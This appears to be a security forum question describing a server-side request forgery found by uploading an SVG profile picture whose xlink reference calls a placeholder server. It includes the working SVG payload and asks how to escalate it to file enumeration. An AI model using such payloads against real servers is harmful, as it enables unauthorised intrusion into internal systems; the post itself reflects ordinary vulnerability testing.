How to exploit SVG xlink-based SSRF
First, let me summarize how the SSRF works:
1) You setup an SVG image with a reference to your server via xlink. Here's an example that works:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://EXAMPLE_SERVER/" /></svg>
2) You upload the image as your profile picture
3) EXAMPLE_SERVER receives the following HTTP request from the server that the image is uploaded to:
GET / HTTP/1.0
Host: EXAMPLE_SERVER
Accept-Encoding: gzip
So all I have been able to confirm is that this is indeed SSRF, as the request is coming from the server, not from my client side. However I'm not very skilled in this area, and I don't understand how to actually exploit this.
So how do I use this to enumerate files or perform any actions that will actually make it a valid vulnerability? I do believe an is-image-present oracle could be set up, but the server I am testing doesn’t have any images on it, so this wouldn’t be a problem.
